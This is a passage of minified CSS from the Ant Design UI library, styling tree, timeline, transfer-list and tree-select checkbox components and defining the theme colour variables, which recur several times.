'tnum'; background: #fff; border-radius: 2px; transition: background-color 0.3s; } .ant-tree-focused:not(:hover):not(.ant-tree-active-focused) { background: var(--ant-primary-1); } .ant-tree-list-holder-inner { align-items: flex-start; } .ant-tree.ant-tree-block-node .ant-tree-list-holder-inner { align-items: stretch; } .ant-tree.ant-tree-block-node .ant-tree-list-holder-inner .ant-tree-node-content-wrapper { flex: auto; } .ant-tree.ant-tree-block-node .ant-tree-list-holder-inner .ant-tree-treenode.dragging { position: relative; } .ant-tree.ant-tree-block-node .ant-tree-list-holder-inner .ant-tree-treenode.dragging::after { position: absolute; top: 0; right: 0; bottom: 4px; left: 0; border: 1px solid var(--ant-primary-color); opacity: 0; -webkit-animation: ant-tree-node-fx-do-not-use 0.3s; animation: ant-tree-node-fx-do-not-use 0.3s; -webkit-animation-play-state: running; animation-play-state: running; -webkit-animation-fill-mode: forwards; animation-fill-mode: forwards; content: ''; pointer-events: none; } .ant-tree .ant-tree-treenode { display: flex; align-items: flex-start; padding: 0 0 4px 0; outline: none; } .ant-tree .ant-tree-treenode-disabled .ant-tree-node-content-wrapper { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-tree .ant-tree-treenode-disabled .ant-tree-node-content-wrapper:hover { background: transparent; } .ant-tree .ant-tree-treenode-active .ant-tree-node-content-wrapper { background: #f5f5f5; } .ant-tree .ant-tree-treenode:not(.ant-tree .ant-tree-treenode-disabled).filter-node .ant-tree-title { color: inherit; font-weight: 500; } .ant-tree-indent { align-self: stretch; white-space: nowrap; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-tree-indent-unit { display: inline-block; width: 24px; } .ant-tree-draggable-icon { width: 24px; line-height: 24px; text-align: center; opacity: 0.2; transition: opacity 0.3s; } .ant-tree-treenode:hover .ant-tree-draggable-icon { opacity: 0.45; } .ant-tree-switcher { position: relative; flex: none; align-self: stretch; width: 24px; margin: 0; line-height: 24px; text-align: center; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-tree-switcher .ant-tree-switcher-icon, .ant-tree-switcher .ant-select-tree-switcher-icon { display: inline-block; font-size: 10px; vertical-align: baseline; } .ant-tree-switcher .ant-tree-switcher-icon svg, .ant-tree-switcher .ant-select-tree-switcher-icon svg { transition: transform 0.3s; } .ant-tree-switcher-noop { cursor: default; } .ant-tree-switcher_close .ant-tree-switcher-icon svg { transform: rotate(-90deg); } .ant-tree-switcher-loading-icon { color: var(--ant-primary-color); } .ant-tree-switcher-leaf-line { position: relative; z-index: 1; display: inline-block; width: 100%; height: 100%; } .ant-tree-switcher-leaf-line::before { position: absolute; top: 0; right: 12px; bottom: -4px; margin-left: -1px; border-right: 1px solid #d9d9d9; content: ' '; } .ant-tree-switcher-leaf-line::after { position: absolute; width: 10px; height: 14px; border-bottom: 1px solid #d9d9d9; content: ' '; } .ant-tree-checkbox { top: initial; margin: 4px 8px 0 0; } .ant-tree .ant-tree-node-content-wrapper { position: relative; z-index: auto; min-height: 24px; margin: 0; padding: 0 4px; color: inherit; line-height: 24px; background: transparent; border-radius: 2px; cursor: pointer; transition: all 0.3s, border 0s, line-height 0s, box-shadow 0s; } .ant-tree .ant-tree-node-content-wrapper:hover { background-color: #f5f5f5; } .ant-tree .ant-tree-node-content-wrapper.ant-tree-node-selected { background-color: var(--ant-primary-2); } .ant-tree .ant-tree-node-content-wrapper .ant-tree-iconEle { display: inline-block; width: 24px; height: 24px; line-height: 24px; text-align: center; vertical-align: top; } .ant-tree .ant-tree-node-content-wrapper .ant-tree-iconEle:empty { display: none; } .ant-tree-unselectable .ant-tree-node-content-wrapper:hover { background-color: transparent; } .ant-tree-node-content-wrapper { line-height: 24px; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-tree-node-content-wrapper .ant-tree-drop-indicator { position: absolute; z-index: 1; height: 2px; background-color: var(--ant-primary-color); border-radius: 1px; pointer-events: none; } .ant-tree-node-content-wrapper .ant-tree-drop-indicator::after { position: absolute; top: -3px; left: -6px; width: 8px; height: 8px; background-color: transparent; border: 2px solid var(--ant-primary-color); border-radius: 50%; content: ''; } .ant-tree .ant-tree-treenode.drop-container > [draggable] { box-shadow: 0 0 0 2px var(--ant-primary-color); } .ant-tree-show-line .ant-tree-indent-unit { position: relative; height: 100%; } .ant-tree-show-line .ant-tree-indent-unit::before { position: absolute; top: 0; right: 12px; bottom: -4px; border-right: 1px solid #d9d9d9; content: ''; } .ant-tree-show-line .ant-tree-indent-unit-end::before { display: none; } .ant-tree-show-line .ant-tree-switcher { background: #fff; } .ant-tree-show-line .ant-tree-switcher-line-icon { vertical-align: -0.15em; } .ant-tree .ant-tree-treenode-leaf-last .ant-tree-switcher-leaf-line::before { top: auto !important; bottom: auto !important; height: 14px !important; } .ant-tree-rtl { direction: rtl; } .ant-tree-rtl .ant-tree-node-content-wrapper[draggable='true'] .ant-tree-drop-indicator::after { right: -6px; left: unset; } .ant-tree .ant-tree-treenode-rtl { direction: rtl; } .ant-tree-rtl .ant-tree-switcher_close .ant-tree-switcher-icon svg { transform: rotate(90deg); } .ant-tree-rtl.ant-tree-show-line .ant-tree-indent-unit::before { right: auto; left: -13px; border-right: none; border-left: 1px solid #d9d9d9; } .ant-tree-rtl.ant-tree-checkbox { margin: 4px 0 0 8px; } .ant-tree-select-dropdown-rtl .ant-select-tree-checkbox { margin: 4px 0 0 8px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-timeline { box-sizing: border-box; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; font-feature-settings: 'tnum'; margin: 0; padding: 0; list-style: none; } .ant-timeline-item { position: relative; margin: 0; padding-bottom: 20px; font-size: 14px; list-style: none; } .ant-timeline-item-tail { position: absolute; top: 10px; left: 4px; height: calc(100% - 10px); border-left: 2px solid #f0f0f0; } .ant-timeline-item-pending .ant-timeline-item-head { font-size: 12px; background-color: transparent; } .ant-timeline-item-pending .ant-timeline-item-tail { display: none; } .ant-timeline-item-head { position: absolute; width: 10px; height: 10px; background-color: #fff; border: 2px solid transparent; border-radius: 100px; } .ant-timeline-item-head-blue { color: var(--ant-primary-color); border-color: var(--ant-primary-color); } .ant-timeline-item-head-red { color: var(--ant-error-color); border-color: var(--ant-error-color); } .ant-timeline-item-head-green { color: var(--ant-success-color); border-color: var(--ant-success-color); } .ant-timeline-item-head-gray { color: rgba(0, 0, 0, 0.25); border-color: rgba(0, 0, 0, 0.25); } .ant-timeline-item-head-custom { position: absolute; top: 5.5px; left: 5px; width: auto; height: auto; margin-top: 0; padding: 3px 1px; line-height: 1; text-align: center; border: 0; border-radius: 0; transform: translate(-50%, -50%); } .ant-timeline-item-content { position: relative; top: -7.001px; margin: 0 0 0 26px; word-break: break-word; } .ant-timeline-item-last > .ant-timeline-item-tail { display: none; } .ant-timeline-item-last > .ant-timeline-item-content { min-height: 48px; } .ant-timeline.ant-timeline-alternate .ant-timeline-item-tail, .ant-timeline.ant-timeline-right .ant-timeline-item-tail, .ant-timeline.ant-timeline-label .ant-timeline-item-tail, .ant-timeline.ant-timeline-alternate .ant-timeline-item-head, .ant-timeline.ant-timeline-right .ant-timeline-item-head, .ant-timeline.ant-timeline-label .ant-timeline-item-head, .ant-timeline.ant-timeline-alternate .ant-timeline-item-head-custom, .ant-timeline.ant-timeline-right .ant-timeline-item-head-custom, .ant-timeline.ant-timeline-label .ant-timeline-item-head-custom { left: 50%; } .ant-timeline.ant-timeline-alternate .ant-timeline-item-head, .ant-timeline.ant-timeline-right .ant-timeline-item-head, .ant-timeline.ant-timeline-label .ant-timeline-item-head { margin-left: -4px; } .ant-timeline.ant-timeline-alternate .ant-timeline-item-head-custom, .ant-timeline.ant-timeline-right .ant-timeline-item-head-custom, .ant-timeline.ant-timeline-label .ant-timeline-item-head-custom { margin-left: 1px; } .ant-timeline.ant-timeline-alternate .ant-timeline-item-left .ant-timeline-item-content, .ant-timeline.ant-timeline-right .ant-timeline-item-left .ant-timeline-item-content, .ant-timeline.ant-timeline-label .ant-timeline-item-left .ant-timeline-item-content { left: calc(50% - 4px); width: calc(50% - 14px); text-align: left; } .ant-timeline.ant-timeline-alternate .ant-timeline-item-right .ant-timeline-item-content, .ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-content, .ant-timeline.ant-timeline-label .ant-timeline-item-right .ant-timeline-item-content { width: calc(50% - 12px); margin: 0; text-align: right; } .ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-tail, .ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-head, .ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-head-custom { left: calc(100% - 4px - 2px); } .ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-content { width: calc(100% - 18px); } .ant-timeline.ant-timeline-pending .ant-timeline-item-last .ant-timeline-item-tail { display: block; height: calc(100% - 14px); border-left: 2px dotted #f0f0f0; } .ant-timeline.ant-timeline-reverse .ant-timeline-item-last .ant-timeline-item-tail { display: none; } .ant-timeline.ant-timeline-reverse .ant-timeline-item-pending .ant-timeline-item-tail { top: 15px; display: block; height: calc(100% - 15px); border-left: 2px dotted #f0f0f0; } .ant-timeline.ant-timeline-reverse .ant-timeline-item-pending .ant-timeline-item-content { min-height: 48px; } .ant-timeline.ant-timeline-label .ant-timeline-item-label { position: absolute; top: -7.001px; width: calc(50% - 12px); text-align: right; } .ant-timeline.ant-timeline-label .ant-timeline-item-right .ant-timeline-item-label { left: calc(50% + 14px); width: calc(50% - 14px); text-align: left; } .ant-timeline-rtl { direction: rtl; } .ant-timeline-rtl .ant-timeline-item-tail { right: 4px; left: auto; border-right: 2px solid #f0f0f0; border-left: none; } .ant-timeline-rtl .ant-timeline-item-head-custom { right: 5px; left: auto; transform: translate(50%, -50%); } .ant-timeline-rtl .ant-timeline-item-content { margin: 0 18px 0 0; } .ant-timeline-rtl.ant-timeline.ant-timeline-alternate .ant-timeline-item-tail, .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-tail, .ant-timeline-rtl.ant-timeline.ant-timeline-label .ant-timeline-item-tail, .ant-timeline-rtl.ant-timeline.ant-timeline-alternate .ant-timeline-item-head, .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-head, .ant-timeline-rtl.ant-timeline.ant-timeline-label .ant-timeline-item-head, .ant-timeline-rtl.ant-timeline.ant-timeline-alternate .ant-timeline-item-head-custom, .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-head-custom, .ant-timeline-rtl.ant-timeline.ant-timeline-label .ant-timeline-item-head-custom { right: 50%; left: auto; } .ant-timeline-rtl.ant-timeline.ant-timeline-alternate .ant-timeline-item-head, .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-head, .ant-timeline-rtl.ant-timeline.ant-timeline-label .ant-timeline-item-head { margin-right: -4px; margin-left: 0; } .ant-timeline-rtl.ant-timeline.ant-timeline-alternate .ant-timeline-item-head-custom, .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-head-custom, .ant-timeline-rtl.ant-timeline.ant-timeline-label .ant-timeline-item-head-custom { margin-right: 1px; margin-left: 0; } .ant-timeline-rtl.ant-timeline.ant-timeline-alternate .ant-timeline-item-left .ant-timeline-item-content, .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-left .ant-timeline-item-content, .ant-timeline-rtl.ant-timeline.ant-timeline-label .ant-timeline-item-left .ant-timeline-item-content { right: calc(50% - 4px); left: auto; text-align: right; } .ant-timeline-rtl.ant-timeline.ant-timeline-alternate .ant-timeline-item-right .ant-timeline-item-content, .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-content, .ant-timeline-rtl.ant-timeline.ant-timeline-label .ant-timeline-item-right .ant-timeline-item-content { text-align: left; } .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-tail, .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-head, .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-head-custom { right: 0; left: auto; } .ant-timeline-rtl.ant-timeline.ant-timeline-right .ant-timeline-item-right .ant-timeline-item-content { width: 100%; margin-right: 18px; text-align: right; } .ant-timeline-rtl.ant-timeline.ant-timeline-pending .ant-timeline-item-last .ant-timeline-item-tail { border-right: 2px dotted #f0f0f0; border-left: none; } .ant-timeline-rtl.ant-timeline.ant-timeline-reverse .ant-timeline-item-pending .ant-timeline-item-tail { border-right: 2px dotted #f0f0f0; border-left: none; } .ant-timeline-rtl.ant-timeline.ant-timeline-label .ant-timeline-item-label { text-align: left; } .ant-timeline-rtl.ant-timeline.ant-timeline-label .ant-timeline-item-right .ant-timeline-item-label { right: calc(50% + 14px); text-align: right; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } @-webkit-keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } @keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } .ant-transfer-customize-list .ant-transfer-list { flex: 1 1 50%; width: auto; height: auto; min-height: 200px; } .ant-transfer-customize-list .ant-table-wrapper .ant-table-small { border: 0; border-radius: 0; } .ant-transfer-customize-list .ant-table-wrapper .ant-table-small .ant-table-selection-column { width: 40px; min-width: 40px; } .ant-transfer-customize-list .ant-table-wrapper .ant-table-small > .ant-table-content > .ant-table-body > table > .ant-table-thead > tr > th { background: #fafafa; } .ant-transfer-customize-list .ant-table-wrapper .ant-table-small > .ant-table-content .ant-table-row:last-child td { border-bottom: 1px solid #f0f0f0; } .ant-transfer-customize-list .ant-table-wrapper .ant-table-small .ant-table-body { margin: 0; } .ant-transfer-customize-list .ant-table-wrapper .ant-table-pagination.ant-pagination { margin: 16px 0 4px; } .ant-transfer-customize-list .ant-input[disabled] { background-color: transparent; } .ant-transfer { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; display: flex; align-items: stretch; } .ant-transfer-disabled .ant-transfer-list { background: #f5f5f5; } .ant-transfer-list { display: flex; flex-direction: column; width: 180px; height: 200px; border: 1px solid #d9d9d9; border-radius: 2px; } .ant-transfer-list-with-pagination { width: 250px; height: auto; } .ant-transfer-list-search .anticon-search { color: rgba(0, 0, 0, 0.25); } .ant-transfer-list-header { display: flex; flex: none; align-items: center; height: 40px; padding: 8px 12px 9px; color: rgba(0, 0, 0, 0.85); background: #fff; border-bottom: 1px solid #f0f0f0; border-radius: 2px 2px 0 0; } .ant-transfer-list-header > *:not(:last-child) { margin-right: 4px; } .ant-transfer-list-header > * { flex: none; } .ant-transfer-list-header-title { flex: auto; overflow: hidden; white-space: nowrap; text-align: right; text-overflow: ellipsis; } .ant-transfer-list-header-dropdown { font-size: 10px; transform: translateY(10%); cursor: pointer; } .ant-transfer-list-header-dropdown[disabled] { cursor: not-allowed; } .ant-transfer-list-body { display: flex; flex: auto; flex-direction: column; overflow: hidden; font-size: 14px; } .ant-transfer-list-body-search-wrapper { position: relative; flex: none; padding: 12px; } .ant-transfer-list-content { flex: auto; margin: 0; padding: 0; overflow: auto; list-style: none; } .ant-transfer-list-content-item { display: flex; align-items: center; min-height: 32px; padding: 6px 12px; line-height: 20px; transition: all 0.3s; } .ant-transfer-list-content-item > *:not(:last-child) { margin-right: 8px; } .ant-transfer-list-content-item > * { flex: none; } .ant-transfer-list-content-item-text { flex: auto; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } .ant-transfer-list-content-item-remove { color: var(--ant-primary-color); text-decoration: none; outline: none; cursor: pointer; transition: color 0.3s; position: relative; color: #d9d9d9; } .ant-transfer-list-content-item-remove:focus, .ant-transfer-list-content-item-remove:hover { color: var(--ant-primary-color-hover); } .ant-transfer-list-content-item-remove:active { color: var(--ant-primary-color-active); } .ant-transfer-list-content-item-remove::after { position: absolute; top: -6px; right: -50%; bottom: -6px; left: -50%; content: ''; } .ant-transfer-list-content-item-remove:hover { color: var(--ant-primary-color-hover); } .ant-transfer-list-content-item:not(.ant-transfer-list-content-item-disabled):hover { background-color: #f5f5f5; cursor: pointer; } .ant-transfer-list-content-item:not(.ant-transfer-list-content-item-disabled).ant-transfer-list-content-item-checked:hover { background-color: var(--ant-primary-color-active-deprecated-d-02); } .ant-transfer-list-content-show-remove .ant-transfer-list-content-item:not(.ant-transfer-list-content-item-disabled):hover { background: transparent; cursor: default; } .ant-transfer-list-content-item-checked { background-color: var(--ant-primary-1); } .ant-transfer-list-content-item-disabled { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-transfer-list-pagination { padding: 8px 0; text-align: right; border-top: 1px solid #f0f0f0; } .ant-transfer-list-body-not-found { flex: none; width: 100%; margin: auto 0; color: rgba(0, 0, 0, 0.25); text-align: center; } .ant-transfer-list-footer { border-top: 1px solid #f0f0f0; } .ant-transfer-operation { display: flex; flex: none; flex-direction: column; align-self: center; margin: 0 8px; vertical-align: middle; } .ant-transfer-operation .ant-btn { display: block; } .ant-transfer-operation .ant-btn:first-child { margin-bottom: 4px; } .ant-transfer-operation .ant-btn .anticon { font-size: 12px; } .ant-transfer .ant-empty-image { max-height: -2px; } .ant-transfer-rtl { direction: rtl; } .ant-transfer-rtl .ant-transfer-list-search { padding-right: 8px; padding-left: 24px; } .ant-transfer-rtl .ant-transfer-list-search-action { right: auto; left: 12px; } .ant-transfer-rtl .ant-transfer-list-header > *:not(:last-child) { margin-right: 0; margin-left: 4px; } .ant-transfer-rtl .ant-transfer-list-header { right: 0; left: auto; } .ant-transfer-rtl .ant-transfer-list-header-title { text-align: left; } .ant-transfer-rtl .ant-transfer-list-content-item > *:not(:last-child) { margin-right: 0; margin-left: 8px; } .ant-transfer-rtl .ant-transfer-list-pagination { text-align: left; } .ant-transfer-rtl .ant-transfer-list-footer { right: 0; left: auto; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } @-webkit-keyframes ant-tree-node-fx-do-not-use { 0% { opacity: 0; } 100% { opacity: 1; } } @keyframes ant-tree-node-fx-do-not-use { 0% { opacity: 0; } 100% { opacity: 1; } } @-webkit-keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } @keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } .ant-select-tree-checkbox { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; top: 0.2em; line-height: 1; white-space: nowrap; outline: none; cursor: pointer; } .ant-select-tree-checkbox-wrapper:hover .ant-select-tree-checkbox-inner, .ant-select-tree-checkbox:hover .ant-select-tree-checkbox-inner, .ant-select-tree-checkbox-input:focus + .ant-select-tree-checkbox-inner { border-color: var(--ant-primary-color); } .ant-select-tree-checkbox-checked::after { position: absolute; top: 0; left: 0; width: 100%; height: 100%; border: 1px solid var(--ant-primary-color); border-radius: 2px; visibility: hidden; -webkit-animation: antCheckboxEffect 0.36s ease-in-out; animation: antCheckboxEffect 0.36s ease-in-out; -webkit-animation-fill-mode: backwards; animation-fill-mode: backwards; content: ''; } .ant-select-tree-checkbox:hover::after, .ant-select-tree-checkbox-wrapper:hover .ant-select-tree-checkbox::after { visibility: visible; } .ant-select-tree-checkbox-inner { position: relative; top: 0; left: 0; display: block; width: 16px; height: 16px; direction: ltr; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px; border-collapse: separate; transition: all 0.3s; } .ant-select-tree-checkbox-inner::after { position: absolute; top: 50%; left: 21.5%; display: table; width: 5.71428571px; height: 9.14285714px; border: 2px solid #fff; border-top: 0; border-left: 0; transform: rotate(45deg) scale(0) translate(-50%, -50%); opacity: 0; transition: all 0.1s cubic-bezier(0.71, -0.46, 0.88, 0.6), opacity 0.1s; content: ' '; } .ant-select-tree-checkbox-input { position: absolute; top: 0; right: 0; bottom: 0; left: 0; z-index: 1; width: 100%; height: 100%; cursor: pointer; opacity: 0; } .ant-select-tree-checkbox-checked .ant-select-tree-checkbox-inner::after { position: absolute; display: table; border: 2px solid #fff; border-top: 0; border-left: 0; transform: rotate(45deg) scale(1) translate(-50%, -50%); opacity: 1; transition: all 0.2s cubic-bezier(0.12, 0.4, 0.29, 1.46) 0.1s; content: ' '; } .ant-select-tree-checkbox-checked .ant-select-tree-checkbox-inner { background-color: var(--ant-primary-color); border-color: var(--ant-primary-color); } .ant-select-tree-checkbox-disabled { cursor: not-allowed; } .ant-select-tree-checkbox-disabled.ant-select-tree-checkbox-checked .ant-select-tree-checkbox-inner::after { border-color: rgba(0, 0, 0, 0.25); -webkit-animation-name: none; animation-name: none; } .ant-select-tree-checkbox-disabled .ant-select-tree-checkbox-input { cursor: not-allowed; } .ant-select-tree-checkbox-disabled .ant-select-tree-checkbox-inner { background-color: #f5f5f5; border-color: #d9d9d9 !important; } .ant-select-tree-checkbox-disabled .ant-select-tree-checkbox-inner::after { border-color: #f5f5f5; border-collapse: separate; -webkit-animation-name: none; animation-name: none; } .ant-select-tree-checkbox-disabled + span { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-select-tree-checkbox-disabled:hover::after, .ant-select-tree-checkbox-wrapper:hover .ant-select-tree-checkbox-disabled::after { visibility: hidden; } .ant-select-tree-checkbox-wrapper { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-flex; align-items: baseline; line-height: unset; cursor: pointer; } .ant-select-tree-checkbox-wrapper::after { display: inline-block; width: 0; overflow: hidden; content: '\a0'; } .ant-select-tree-checkbox-wrapper.ant-select-tree-checkbox-wrapper-disabled { cursor: not-allowed; } .ant-select-tree-checkbox-wrapper + .ant-select-tree-checkbox-wrapper { margin-left: 8px; } .ant-select-tree-checkbox + span { padding-right: 8px; padding-left: 